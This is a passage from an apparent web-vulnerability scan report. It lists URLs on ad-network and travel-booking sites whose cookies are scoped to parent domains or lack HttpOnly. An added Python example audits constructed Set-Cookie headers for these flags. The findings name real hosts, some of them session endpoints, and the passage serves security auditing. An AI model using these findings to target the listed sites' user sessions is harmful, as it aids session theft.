13.115. http://r1-ads.ace.advertising.com/site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

13.116. http://rs.gwallet.com/r1/pixel/x1743

13.117. http://rs.gwallet.com/r1/pixel/x914r7675757

13.118. http://safebrowsing.clients.google.com/safebrowsing/downloads

13.119. http://sales.liveperson.net/hc/15744040/

13.120. http://servedby.flashtalking.com/click/1/16628

13.121. http://servedby.flashtalking.com/imp/1/16628

13.122. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.123. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.124. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.125. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.126. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.127. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.129. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.130. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.131. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.132. http://tag.contextweb.com/TagPublish/GetAd.aspx

13.133. http://tap.rubiconproject.com/oz/feeds/targus/profile

13.134. http://tap.rubiconproject.com/oz/sensor

13.135. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

13.136. http://travel.travelocity.com/hotel/HotelAvailability.do

13.137. http://travel.travelocity.com/hotel/HotelCobrand.do

13.138. http://travel.travelocity.com/hotel/HotelDetail.do

13.139. http://travel.travelocity.com/pub/gwt/hotel/esf/NoCacheAction.do

13.140. http://travela.priceline.com/sharedapps/scs

13.141. http://u.openx.net/w/1.0/sc

13.142. http://user.lucidmedia.com/clicksense/user

13.143. http://uxm.thousandeyes.com/rest/json

13.144. http://vitamine.networldmedia.net/bts/generic14.php

13.145. http://www.agoda.com/partners/partnersearch.aspx

13.146. http://www.booking.com/general.en-us.html

13.147. http://www.booking.com/hotel/us/c-boston-massachusettes.html

13.148. http://www.booking.com/hotel/us/copley-square.en-us.html

13.149. http://www.booking.com/index.en-us.html

13.150. http://www.booking.com/logo

13.151. http://www.booking.com/searchresults.html

13.152. http://www.cheaptickets.com/shop/hotelsearch

13.153. http://www.expedia.com/Hotel-Search

13.154. http://www.expedia.com/TripPreferences

13.155. http://www.expedia.com/daily/common/mscookie.aspx

13.156. http://www.expedia.com/pubspec/scripts/eap.asp

13.157. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

13.158. http://www.hotels.com/PPCHotelDetails

13.159. http://www.hotels.com/PPCSearch

13.160. http://www.hotels.com/compare/hotel_dockingbar.html

13.161. http://www.hotels.com/hotel/details.html

13.162. http://www.hotels.com/hotel/hoteldata.html

13.163. http://www.hotels.com/hoteldetails/urgencypopup.html

13.164. http://www.hotels.com/html/blank.html

13.165. http://www.hotels.com/html/tealeaf.html

13.166. http://www.hotels.com/search.do

13.167. http://www.hotels.com/search/search.html

13.168. http://www.hotels.com/selectors/en_US/

13.169. http://www.orbitz.com/

13.170. http://www.orbitz.com/App/SubmitQuickSearch

13.171. http://www.orbitz.com/App/ViewDHTMLCalendar

13.172. http://www.orbitz.com/App/ViewFlightSearchResults

13.173. http://www.orbitz.com/shop/hotelsearch

13.174. http://www.tumri.net/ads/ads

13.175. http://www.wtp101.com/f

13.176. http://www.wtp101.com/pixel

13.177. http://www.wtp101.com/pull_sync

13.178. http://www.wtp101.com/push_sync

13.179. http://www9.effectivemeasure.net/v4/em_js
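Sections 9, 13 and 14 of this report are three views of the same thing, the attributes on a Set-Cookie header: Secure missing on a cookie issued over HTTPS (section 9), a Domain attribute that widens the cookie to a parent of the responding host (section 13), and HttpOnly missing (section 14). The audit below is an added example written for this page, not code from the XSS.CX report or from Burp Suite; it reproduces the three checks on constructed response headers so the categories can be re-verified from a proxy capture without re-running the scanner. Host and cookie names are constructed.

```python
"""Added example (not from the XSS.CX report or Burp Suite): audit Set-Cookie
headers for the three cookie-attribute findings in this report: a cookie set
over HTTPS without Secure, a cookie without HttpOnly, and a cookie whose
Domain attribute widens it to a parent of the responding host. The headers in
__main__ are constructed."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple


@dataclass
class CookieFinding:
    name: str
    ssl_without_secure: bool      # section 9 class
    without_httponly: bool        # section 14 class
    parent_domain: Optional[str]  # section 13 class: the wider domain, or None

    @property
    def issues(self) -> List[str]:
        out = []
        if self.ssl_without_secure:
            out.append("SSL cookie without secure flag set")
        if self.without_httponly:
            out.append("Cookie without HttpOnly flag set")
        if self.parent_domain:
            out.append(f"Cookie scoped to parent domain ({self.parent_domain})")
        return out


def parse_set_cookie(header_value: str) -> Tuple[str, str, Dict[str, str]]:
    """Split 'name=value; Attr; Attr=val' into (name, value, {attr_lower: val}).
    Flag attributes such as Secure and HttpOnly map to an empty string."""
    pieces = [p.strip() for p in header_value.split(";")]
    name, _, value = pieces[0].partition("=")
    attrs: Dict[str, str] = {}
    for piece in pieces[1:]:
        if piece:
            key, _, val = piece.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_set_cookie(header_value: str, scheme: str, host: str) -> CookieFinding:
    """Evaluate one Set-Cookie header against the scheme and host that sent it."""
    name, _value, attrs = parse_set_cookie(header_value)
    domain = attrs.get("domain", "").lstrip(".").lower()
    host = host.lower()
    # Domain=example.test on a response from www.example.test makes the cookie
    # readable by every other host under example.test.
    parent = domain if domain and domain != host and host.endswith("." + domain) else None
    return CookieFinding(
        name=name,
        ssl_without_secure=(scheme.lower() == "https" and "secure" not in attrs),
        without_httponly="httponly" not in attrs,
        parent_domain=parent,
    )


def audit_response(headers: Iterable[Tuple[str, str]], scheme: str, host: str) -> List[CookieFinding]:
    """Audit every Set-Cookie header in a (name, value) header list and keep
    only the cookies that have at least one issue."""
    findings = []
    for hname, hvalue in headers:
        if hname.lower() == "set-cookie":
            finding = audit_set_cookie(hvalue, scheme, host)
            if finding.issues:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    # Constructed response headers, as a proxy or scanner would record them.
    response = [
        ("Content-Type", "text/html"),
        ("Set-Cookie", "JSESSIONID=0A1B2C3D; Path=/; HttpOnly"),
        ("Set-Cookie", "tracking=xyz; Path=/; Domain=.example.test"),
        ("Set-Cookie", "csrf=abc; Path=/; Secure; HttpOnly"),
    ]
    for f in audit_response(response, "https", "www.example.test"):
        print(f.name, "->", "; ".join(f.issues))
```

Two caveats when reading the output against the report. The parent-domain check mirrors the scanner category (Domain names a strict parent of the responding host); per RFC 6265 any Domain attribute, even one equal to the host, already drops host-only scoping and sends the cookie to subdomains, so a cookie that matters should usually carry no Domain attribute at all. And severity follows the cookie, not the flag: a missing HttpOnly on a third-party tracking pixel's cookie is noise, while the same flag missing on an `americanexpress-travel.com` or `secure.mlb.com` session cookie is the finding to chase.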

14. Cookie without HttpOnly flag set

14.1. http://ads.adxpose.com/ads/ads.js

14.2. http://afe.specificclick.net/

14.3. http://aon.com/

14.4. http://as00.estara.com/fs/rules.php

14.5. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

14.6. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

14.7. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

14.8. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

14.9. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js

14.10. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

14.11. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

14.12. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

14.13. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

14.14. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

14.15. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

14.16. http://event.adxpose.com/event.flow

14.17. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

14.18. http://go.americanexpress-travel.com/hotel/HotelCobrand.do

14.19. https://go.americanexpress-travel.com/SSOAuthenticateResponse.do

14.20. https://go.americanexpress-travel.com/hotel/HotelAvailability.do

14.21. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

14.22. http://hotelplanner.com/

14.23. http://hublotnation.com/

14.24. http://ots.optimize.webtrends.com/ots/ots/js-3.…

14.25. http://ots.optimize.webtrends.com/ots/ots/js-3.…

14.26. http://ots.optimize.webtrends.com/ots/ots/js-3.…

14.27. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75d5010d692ad89ce20478fdda038aa0753f64b07ead19d11caf50cd75a632df77193a62612b5e7c9d6078da4a8476d3242d68e02f406c22e308b5e346da5b9638fb1fee0e12cc51afe6f31a01c4cbd5a0209f0efba58311bf558a07114d307f7f748fe32ef946716ffb97bd82703eb0392e758af6bce57844146ac2a00fb7ec24a886926fde5779c1ea94b83273b2c7a5f8ef6c0e3c72a73d7a7e6da98efae9ffee804345fa58b8e969a10047c915a7047da5b9c185a7a68d15ecc4fa1bef3ad3eb2387f16a034397f686bf0705876365c85e46a7284672840374716385395c0199f9fa5b728b6562a8729b36f124d2a6bb9e1eb37005d1610bb7cd7e496f310de1c06938c7510ae46c64c59a47ffbc10fcfa02bfa8ee7600e4b35b37ba7fc462c3900299c926f1e4fd768cba5f430f8c6a5fa5f8d31a2475371537b8bc2440c580257b4b71e1c0084e78e420c14ede5ef1b8501e7461bdbc8b69be53457201ab44ec22f0b2a34aa0ab77ccb8ef89d0a3665f559cc4381d6edbcc72131066e0ef09c53cb1c07f6fdd10beeccfe748bdaa7892a170cac0d7c323253596d5a9417803bbf18d04d047f76a34f89344cc71d1dca266a4e3ce70729955e4a588ac59251f141d6fd46fdb980e0a92d5fae78abd3f124873f3756deaf09139d660d5df01701329f9b2eb8bcb8ff0dc9156811860854926d97d5aac3facc2c62beed5d54daa84f95ee47c134ab9e097e266b27826980f2be9222a77974314710359444121312d58692f96e7c649295431cc87e0fa2e5923b286fd9272354a6f68690ac077cd2d574978183706b2b038bbc59e348da2a95fd19a2b150d07bedb78ab5c301e02bf2cbc78c8458a2cb43f573ad17988d3e3de312b4851cd610a86ffdba4ae5e76741d2ba2612b17449cbfb8327f7038007ed762e6eece45f89781111f33f9718bae687dcc8fa5796061423bf6a72a03f98b11405647a2a8e1e38c4afa54737ae44c999b6db129c631bfff68fc88e77af85217d3e1cdb826a30d15ffd6c542526342e3d010a004d236435539b15f6a98957250c716744a5117a33096396fc052a5ac8aabd02879d7cccd54daba1b9034dd07c281ba45a7350a00c0c9dd7e7293294c4f8e6a1ddbf4ba12a4587a660d0ff012505a3e84aa6e6f9854f6c63f7f2c5079d5a11f168d38715024afeab05e43102

14.28. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.29. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.30. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.31. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.32. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.33. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.34. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.35. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.36. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.37. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392deb9e91585f035b3a35cd925087e761247a6fade9720dc2253cb41cf81885470770d955ab4acb239f14bfe72a4ddb25c56203f36663201e127f7abd60b0392424be18baebafe451e1f63305b9c721ab72a4f74205059da3f3e4d19602a7225fc98746eae27270322364a9f84488ce4e91ae6a939ffedaac315747c9771ba2317479c1dd3522b852064815ef645eae714a67f92f1921145aa35e9969c917e3a6ebf92c40e9f7d28cc04e8342ff3ffd2a1b9ff93d33774ca86c470dcb92ad9fd92936a0fb8345836e22c11737f2cc991681ac289d7e5302fb55bd9d0f76da89a7890bd6a1a5116a365bcd8654f218c63164de43662abdab3dd6e7bdc7b26cc44bea6d25e04c03fa5d1c6d8d9ced6e153dbe12d125489453b4b100a75e9bf11a679acf19bb2165a14fcba51ffd079714c50820e47d59b96dcb598e652bfceb7a9e07ae5d813450463c1ecda4d2e9d53971c4e5a18dda87fad8acb7133744e9c1cdd1941e797c935a3347970fca5b173a67b9388c0df5e9a5f643b2270f55e16f75083e249b3213372a2ce9ff3c25c571635b2a067c7d42ded35998dabcb622b251729c2aa76f1b4d7a3cebe7ec6451594512ed7f87e2c7f243d24d019d8c7e13ad44c44e08af75ffcf03cca073ac88e6695f4f67e671f3ac1a796a5370cd913d1849836ac9f1f23aa297a1ab08da6ba0130026547dd8c1170f58565beab11e480e81e48d450243bfe5b61dd253e4431988cdeac8b0645d2e13b24a932e0f7935ad5ee0299184ad98013035f80ecc4cd6d5beb6c2766a03640af7cf08981f57f2aed80cb49ba973888da08d2c425aa8007e717b426d0c37ea7fa07ab55e8f101f6a32c829c82219c00b418d227c466ce5527499081d588fdfc201a24f82f44ba1b6d2fff9784cb56fcd9dbd32d27e68119df750079367005de70b577fe2f5408cb8a5f156bd582e6cc643159002e488b9ceed902c63b7b84a4a9d92
76d3f81d9620a28d093d33704eb82ccdfef7d42de37d6a36441761954b1d4e12d19d91b2673122d399135a883a1bb889d27634308f762549a9f88297f61d25938a71c3d7d8216b2f5483ea58e018de7299fe1cf1a0489140fea591a58201a567a3c1948f8518f9db1ffe2faa1599886c3aba43e1d54c8742af6afde943e5bd6813debe2715b17647cfaa8229a10b8657bc222c6abfb504dd7a1610a568cc4de9e7828d9eac55c202462abf6a77a63cceb61d5764797fdf126fd2b1e22b72e30cc097b48908cd6f4ff0aecc93cd74add7247d3f4add823266d05dfe655f27243a2d7e151860781e1b56718d16e3a3d5173c463904e857fd

14.38. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.39. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040957a5dc4044909cae61afa1b86f68ca755f466533d6d9c80442400e6d7eb0ad62c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1920917fa29f9295df334353d005c0f24f948ae762a20be0f89e8a1fe04a8b50825ff84219b7afdbc15570983bef1e187c647eb275fd4814efbf83f2467694080856af0ad79bb8754b6a5ebc0f5794d75bd1a65c349420faab94819bb47071e19bd795cb3751233fe6011264809ba1ec67fdc0895b4f6ba583dcca794e79308d71daf6dbf0066f489312564608b6b1120ce83be9cc026368fddb96a885b1efa484abb9ac95bdcf741c03e1044900be3c65667d585a6800fdeb5bc072e690991f105b3489b3d6ecc07247df4ab629ddeb8f5f96dd446ba7a30ad0b40a65d0a6db7faa12b1c6aaf49957554c656b0b75ea25991a7102ac9ca4bb4223ea940c3a402fe039f16c10378bf205ea63acd0b8f6225f6b671cb4ffe489c723b2e785b91f1c1e0943c6893b0ec858c99fe89ffb4103a4fb4cac9cade584745d1193811d40c890b54772087519f1aaef7b3a900e63a0c51e86a7603302fc23c0d31657ffeb9297c9f3572416440143f05939e1ccecba7b929b401728c20b03b14457f61bbb2ef33035c1042bc7ad7e690aa47d84d5699d77e46ac45974806a57eaec20fc9f02aa9d9b13d0c423db170a0fa462f6d0227cec13a4e47d36bcbf7a23af7c6f3ef409b0db1571b2759279a874a0646535bb9e346034dd7dd89157a52aee8ae36dc12d1544a9ccbceebbb75553b4eb945907a092a68f80fb2299f83fa9f093637f9559e1ed3dfbcbd90706f006c0ef49f529e1954a6a0db0dbf98f7728a8bf6887d140ea60c2e2727433c0030b177fb2eb40bda1145306d9a20c97847940915d972774c6ee10f28c55e4e5c8d88c706a64386f61af2e0d0fdfe2b56fb2ca0d3fb7987773153dcf90449923a500dea1112278ff412f5f1e4a91d90016e0d8b11069474c5dfafc5fdc4266fb3bf471ac8c7
22d3fe129124a7880d3e6b7a1de879ccaca78129e07a3e30461530914c1c1a08cf8afca02b7c7c899c45428d6516b683c7752464d527251aa6fd81c3ac1674c0837391d085706f3b4a90d83f8c3db90882a10daff75ede06c59cd1b4dd05b03ce7c3dc8b8c4ba9d113ff79ab40808f6c6ab515ee8811d940b66af7ea44b3bc681ad2ba6a12b57549cdf08d26fa049c57ac3f3d00d5a448d2280418b43dda4fedff8788d2fc559600162bb5317ea17bd0f0723c213b258f0834d2ace25827c87dd88cbd9607c0744be8a6dd98d827f78a7f263e56dec93a7b9719a7371561367e602100c720c5

14.40. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.41. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776af9271f153863f09fd35a5417533339979f0989b728624c6cedd54716cb6e1ba617a951d33a4a30b430f4179e5cc942e0a0291bad6794710fe13e27645e557c77a978a87c2f20bf59ecf1f4c762dbc40b3085ac049153d4f8171659d7b5a2b8888e52ab771d8adb43fba67f7b287b3df4ea08c5da199cf837c2ccb9daac685025cb0a64d432697beef82a18ac1c00095afd3833c4163d5a9e477b444360fd489d2990598cfeaeec6a2bfba18bd8d4408349e42ef75a0c87ec494e1e14ec0a114a93c7efd8996745c5daa47ca56d14e14700a382da169aba12d726052dd351fc8710319286a1890ad8aeb21f7f6556da8604f118927935dc10623da6ef7e8bb8aeb8b47a9140f06165a50946a84c0278ebf6a928193ff919c27253c654b7b70bf75ecba0487e9a981cbb256da940c2a052f803c04793087fec700df568ce5c8b3521f7ea24cc48f9489a703a78700bc1a791b6963e3996e2eb888fc8aed8afb71e3c4be3cec892800c114284176d45810cdf090d7421d152ca1aa0a5b4af57bb3b0d00e96a7004362a92300460627ff6b97f7ec266234f3247426f05939318c590f2e22be351728729e33e1b402960bbe0eb6705531f47eb2c84eb96af15dd1a02c88d7f44ff45911c0fa472fcd41adfcd65bbc3b437570e76bf2fe9a8467f3f0c3c8ec1061d4ff32b88aaba47aed4c5b909c96087615b660c6b8bcc1c5b085150e9b0191d5b81b68e170a13bfbdee4ed655bb411c88cce99ce5615f2f48b44a977c042a38af0cb9289b82ad9f0d3530f8549b4cdad4efb7c126390d6b09f5ca09c94c5ba5a8dc00ebcff92388dba4882b1151a7512e272d456d5d61b472a62be00dd84f153561c4729d7218945a118e20724c6cee5527c4081f5b8eda9a50f015dbfd4ef1b3d5f8af2c57ae2ea4ddaa2585203454dcad094e9c3c055bec1547268ef647f9fdb7fc1c96023c0781455493269482abc5f990246cb5bf5d54daa8
6794b447cd72f4910f653f7f41ff26d6f9a7d47be67f6832111831934d18491d809b90e27d7e33b1ac7f29ea1f01ba988c2b242e941c190ce5a2d284af0777de8226c2d3d8726a2a5181a15ae04ade7e99a217fea552c317abf491f9895caa30ebc3c18b8a4fa1d01ef47cb2428c927d04dd55a3dc4bc34cba6aeaea47a8b4610cdbbf7514b37d47c0f1823cee10ed39fb67723ca8eb1e8e680a00c953810ab6ab9482defc4896041225b9307faf61cafc1c4d65613d98476d83efe20978ea01a848e2

14.42. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.43. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.44. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.45. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.46. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.47. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097cbad24c4491d2a045edacbe7667b7643201395ddd85935675175c2e3597d81ec7f77c301528f0861619836210bd15e01494161f679046cd3ea440fb65c7801b6cdb15c0785ae23675645c05656ca824ea267721a956b4efe2a70bb4a76e10e7dd20fd29b3a81b5750cdf2a0cc8797498b0d77d29a74fbf96b7b6e3c60a8857ef6a272aa8452aec9d28be22b017eee772082045063f7e71611fc50474a14b96c5ab6704433fe2c1924450cbb12cc6dc90af1baf8eb7312f98881c095128342ff6ebd195c91f75d256f50ac52435d87d5eec6987458d691f829e41c42bb155bb08fcd5bd1f74fc32416419512e7cb5a6cd89db8810cdfa0a51c643857d59951e507d1400b9b073b6ab3b36c8eaffeb0f929970df96436a30b4fa6470879f0efba452729e84590365c8753a7ac1acd32ddb2443389c60abd3a6dab46c4a608f50c9e15de0037ed6b1ae3319b1bcb723ee78c35dc07ea0cc864222e705f96ffd2e9d56d66cce5eb8ad9c8ad8aafe3123b4ab7c9cfcad9054541d04d6612d704df5a022577d15ecc48aaf2e4a950b26f0b05e66a7702622fc0625c313579f3bd79799735204a6510146c52939f4ccd9df3e32fb15379db23b73344102a3eeae3eb3751524747b92984b3c5ad41dd4a57ce8e2316fd42cb4c09ae70fb970ecda573add4e4390d4333b37ba6fb487f3a5629cc933a1a4680689efff139f492a0fc588034a0410477017f8a91175c5f0703e9e61c1b0b8ebadb470b46e8bdee41d551bb144dd49fbbcfb06257204ab318c420597c3aab5de028ca8ead9c0c6361a45dc91dc1caffd1833127563356b0db5ec60255faaddf01a089ae4e888fd6cb384a11d05b6a436a147e0b449029e123a75f8010173061ce75992612c40813de24754e6cef0f27c55d400e8a8f9604f546d5f449a6b580f8fd265cac7ff7d2aa2f84703550ddfe041297690c59ec1f167d8dfc46fcf9b6a54c900e3f0f871e03907594d7fec7fc962263bfbe4c4fcbc3
7384fe4c9773a3d90f3d6c7a1ee82496fef6892ae07e3c37421263991e1d4f4f859c94e666602185c0195e8e6e40b68dd776316180742540a5fe8197a61073948b75c3d2d2743d215580b95fe6198878c5ae4afea01fc315fff1c0f08454a431f6ca93989158c79e52e227f317cb936862b716ee9313c310fb3fa7b844b4b7341bd9be7417b77d4ac8f0843cee10e532d1554f1ca8eb1ed62e045feb7103ee4dac

14.48. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097faad25255cec6b40eabb0a73969b9191a1b0b56e0819b7c5c17493824c1c009d8f47b361528f0865b488d231cbd11e21882470726c934d925a847ee70d6830875c82c9e230ae96c2766431d6937f93af6262220e119b3bee6ba16b4a63e47e58b7bf227bdaa0d4f48cae5d4a8899929800359cbb942ecfd786c6b3b7c9b9d6beab379bb9255c9a5fe8cf73e1c74d2403c82007f4ce8e7155fe448544219b56259b7734531e4331c25430aa00ccc6dc918ffb4a9f17c06cdab90d79e589b5aa968ba091b9ff920254551b55e00459fc6f1d9987458df9cfe29e0185fa41759b68dc15bd0f741db3b14439310ebcb5b6cd685a7830ed9a2a91c653859cd8642eb09ac40219a1e342aabab7f91b0feafe6288912fb6630a1074fa747066dfee1c7450d28f14bd12e449440a9a267cd18dcab536b91de19a2256fa940c6aa08f40c900dc11f28f2301bfa3f8b1a9b7c309aa436865cec1adf3b38207c5c99e4caf1913c3d90e3ecdddf98a9dfacb2403e48b0cfcec2dd5e1447844f3c1785048c585326758451981aa0a7b3f558b5310856b26c2652342a96300d63602ea2eb717b933a244d3612423905c2c01ecbcaf0e528b35e7e8e23b16f15417969bcb2bf3202081f10ec2980e6c7af44dd1657cedc7013fe43c01c0ea871aac1509ea625fc8be26a0a4260e975f1a61c7e680d77cf963c4f46836e9da7a76ff497f0ac58da30f7140127057bdd91435f52005abdb319170e85e189415914ebb2e640855ce1154ad5cdbccae46e5d201fb84c982e587a3cfb0cb02dcb85fc9c006330a15d9c59cfc482f9806b6a5a324cb6c65d87185bf6aed015f99c902088ffe7cb245f26f1434e647b013c7847bc65f93be003801845666699759a7343910b11db26751e34ef00749054185cdddec557f040d3f21cf1b780aba02c5bab28aa89fa29d022335789a0041993670759e713402e85f340fcabedfe4cca51690a8a405794719783a8c7acc22c63e3e8484bcc94
7484fc1fc724f48b593a392f4de57e95adfd827db32e6d3647403ac24b4f4e4cd79f92ee6d6272dec1115b883f15b788dc78653481207f4da0fd8295a01022c8d127c3d0d323612a5484bb5eb11ada2e95fe17f5f04dc341a8a794f48202a633f294d0969f25ef9d08a125f8168389666eb419f58b0b8715fc38a7ec41b4e06811d8bc7647b77c469cf99632e065e639c8435c7db0f355db685b5feb01ecb7cd

14.49. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.50. http://ots.optimize.webtrends.com/ots/ots/js-3.

